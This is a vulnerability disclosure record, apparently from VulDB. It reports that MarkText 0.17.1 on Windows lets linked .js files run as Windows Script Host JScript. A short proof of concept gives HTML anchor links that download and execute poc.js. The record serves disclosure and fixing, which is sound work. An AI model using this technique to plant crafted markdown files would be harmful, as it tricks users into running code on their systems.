| Title | MarkText on Windows doesn't filter WSH JScript, which may cause code execution |
|---|
| Description | Although marktext filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
Version: 0.17.1(latest)
PoC
Local
<a href="poc.js">Click me to execute JScript</a>
Remote
<a href="http://127.0.0.1:8000/poc.html" download="poc.js">1.Click me to download JScript</a>
<a href="./poc.js">2.Click me to execute JScript</a>
For more details, please click the announcement. |
|---|
| Source | ⚠️ https://github.com/marktext/marktext/issues/3575 |
|---|
| User | Tom23 (UID 41413) |
|---|
| Submission | 02/20/2023 13:15 (3 years ago) |
|---|
| Moderation | 02/24/2023 08:56 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221737 [MarkText up to 0.17.1 on Windows WSH JScript code injection] |
|---|
| Points | 20 |
|---|